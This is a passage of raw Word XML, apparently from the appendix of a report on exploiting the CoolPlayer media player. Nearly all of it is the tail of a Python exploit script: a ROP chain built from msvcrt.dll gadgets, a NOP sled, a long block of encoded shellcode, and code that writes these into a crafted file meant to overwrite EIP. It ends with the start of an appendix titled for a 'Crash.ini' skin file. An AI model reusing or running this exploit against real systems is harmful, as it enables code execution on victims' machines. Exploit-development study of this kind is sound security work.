          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> # ret ' [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361354F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734702B2" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    return '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>'.join</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>struct.pack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">('&lt;I', _) for _ in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>rop_gadgets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063F4F31" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45CDCD43" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>rop_chain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>create_rop_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>chain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0348619B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "\x90" * 60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD517C2" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BFD138B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>#shellcode = "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E39075" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0329A25A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode = "\x89\xe2\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\xc8\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49\x49"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F45F740" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2B3C50" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B5AB25" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F737B5E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x39\x49\x5a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C507F37" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x4b\x4d\x4b\x39\x49\x52\x54\x31\x34\x4c\x34\x46\x51\x48"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372D586B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x52\x48\x32\x34\x37\x36\x51\x58\x49\x45\x34\x4c\x4b\x52"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A5C906" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x51\x50\x30\x4c\x4b\x32\x56\x34\x4c\x4c\x4b\x43\x46\x35"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301DE850" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x4c\x4c\x4b\x51\x56\x43\x38\x4c\x4b\x33\x4e\x37\x50\x4c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06660594" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x4b\x37\x46\x47\x48\x50\x4f\x55\x48\x54\x35\x4c\x33\x46"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F0C14E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x39\x33\x31\x58\x51\x4b\x4f\x4d\x31\x33\x50\x4c\x4b\x32"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39348C34" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x4c\x51\x34\x57\x54\x4c\x4b\x30\x45\x57\x4c\x4c\x4b\x56"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF36994" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>shellcode += "\x34\x51\x38\x33\x48\x35\x51\x4b\x5a\x4c\x4b\x50\x4a\x35"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28261F92" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x48\x4c\x4b\x31\x4a\x51\x30\x33\x31\x5a\x4b\x4a\x43\x57"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5995DE7B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x44\x37\x39\x4c\x4b\x47\x44\x4c\x4b\x33\x31\x4a\x4e\x50"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65850898" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x31\x4b\x4f\x46\x51\x49\x50\x4b\x4c\x4e\x4c\x4d\x54\x39"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA7AF59" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x50\x53\x44\x45\x57\x4f\x31\x58\x4f\x34\x4d\x33\x31\x39"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFEB40A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x57\x4a\x4b\x5a\x54\x37\x4b\x33\x4c\x57\x54\x37\x58\x32"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084D9AC9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x55\x4b\x51\x4c\x4b\x30\x5a\x31\x34\x55\x51\x4a\x4b\x55"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2437B882" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x31\x4a\x35\x4c\x53"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AE2281" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x31\x5a\x4b\x4c\x4b\x54\x44\x4c\x4b\x53\x31\x5a\x48\x4c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6E6916" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x49\x51\x54\x46\x44\x35\x4c\x33\x51\x49\x53\x4f\x42\x33"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C229A3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x38\x46\x49\x39\x44\x4c\x49\x4d\x35\x4c\x49\x39\x52\x33"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C43858" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x58\x4c\x4e\x30\x4e\x34\x4e\x4a\x4c\x31\x42\x4d\x38\x4d"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B2519F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4d\x59\x47\x35\x55\x54\x4f"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F22FCE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x4b\x53\x4e\x39\x48\x4a\x42\x53\x43\x4b\x37\x45\x4c\x56"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2320D305" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x44\x36\x32\x4a\x48\x4c\x4e\x4b\x4f\x4b\x4f\x4b\x4f\x4d"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4C30D9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x59\x47\x35\x33\x38\x43\x58\x52\x4c\x32\x4c\x51\x30\x37"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFAB9FE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x31\x33\x58\x37\x43\x30\x32\x56\x4e\x53\x54\x43\x58\x32"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BE11D9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x55\x53\x43\x33\x55\x54\x32\x50\x30\x49\x4b\x4b\x38\x51"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBFA41A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x4c\x37\x54\x44\x4a\x4b\x39\x4d\x36\x36\x36\x4b\x4f\x30"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C072D00" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x55\x35\x54\x4b\x39\x38\x42\x30\x50\x4f\x4b\x4e\x48\x39"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A560B48" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x32\x50\x4d\x4f\x4c\x4c\x47\x55\x4c\x36\x44\x50\x52\x4b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FB7810" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x58\x51\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x42\x48\x32\x4f\x32"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4739CC6A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x58\x56\x38\x57\x50\x55\x38\x55\x31\x35\x37\x43\x55\x50"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F63C6BE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x42\x32\x48\x30\x4d\x52\x45\x32\x53\x54\x33\x50\x31\x59"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CC1E66" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x4b\x4b\x38\x51\x4c\x46\x44\x55\x5a\x4d\x59\x4d\x33\x32"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB6EB73" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x48\x30\x58\x37\x50\x51\x30\x31\x30\x53\x58\x30\x4d\x31"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A735DB1" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x43\x57\x36\x51\x31\x33\x58\x44\x32\x42\x4f\x52\x4d\x57"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DE21A5" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x50\x53\x58\x32\x4f\x56\x4c\x47\x50\x52\x46\x52\x48\x51"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BDA8AF" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x58\x35\x35\x32\x4c\x52\x4c\x30\x31\x58\x49\x4d\x58\x50"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FD1112" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x4c\x47\x54\x34\x50\x4b\x39\x4b\x51\x30\x31\x49\x42\x51"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6784D506" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x42\x50\x53\x36\x31\x50\x52\x4b\x4f\x4e\x30\x50\x31\x4f"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DED4030" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode += "\x30\x36\x30\x4b\x4f\x56\x35\x35\x58\x41\x41"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C458B0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="248B3D78" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>file.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(start+junk1+eip+rop_chain+nop+shellcode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC1DCCB" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>#.$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shellcode;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04401411" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>file.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294E8C1F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc71564028"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Appendix B - .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ini</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Files</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w14:paraId="456240BA" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc71564029"/>
      <w:bookmarkStart w:id="94" w:name="_Ref71628497"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New"/>
        </w:rPr>
        <w:t>Crash.ini</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w14:paraId="6559F3A3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoolPlayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Skin]</w:t>
      </w:r>
    </w:p>
